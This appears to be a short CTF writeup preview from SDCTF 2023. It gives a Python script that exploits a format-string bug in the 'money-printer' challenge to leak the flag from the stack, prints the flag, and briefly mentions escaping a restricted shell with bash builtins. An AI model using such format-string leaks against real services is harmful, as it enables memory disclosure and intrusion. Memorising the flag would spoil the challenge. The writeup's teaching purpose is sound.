SDCTF 2023 writeup

I participated SDCTF 2023 as Wani Hackase and took 5th place. Thank you for organizing nice CTF events! PWN/money-printer This binary contains a format string bug and the flag is located at stack. I just send %i$08lx to reveal the flag as shown below. 1from toyotama import * 2 3_r = Socket("nc money.sdc.tf 1337") 4_r.sendlineafter("want?\n", -1000) 5 6_r.sendlineafter("audience?\n", " ".join([f"%{i}$08lx" for i in range(10, 16)])) 7_r.recvuntil("said: ") 8flag = _r.recvline().decode().split() 9 10flag = b"".join([bytes.fromhex(x)[::-1] for x in flag]) 11flag += b"}" 12print(flag) sdctf{d4mn_y0u_f0unD_4_Cr4zY_4M0uN7_0f_M0n3y} MISC/Form bomb protector After connecting the server, it spawn a shell but we cannot use most commands since some syscall is prohibited. It accepts bash builtin commands, so I combined some of them to read the flag. ...

2023-05-11 · 11 min · 2315 words · Laika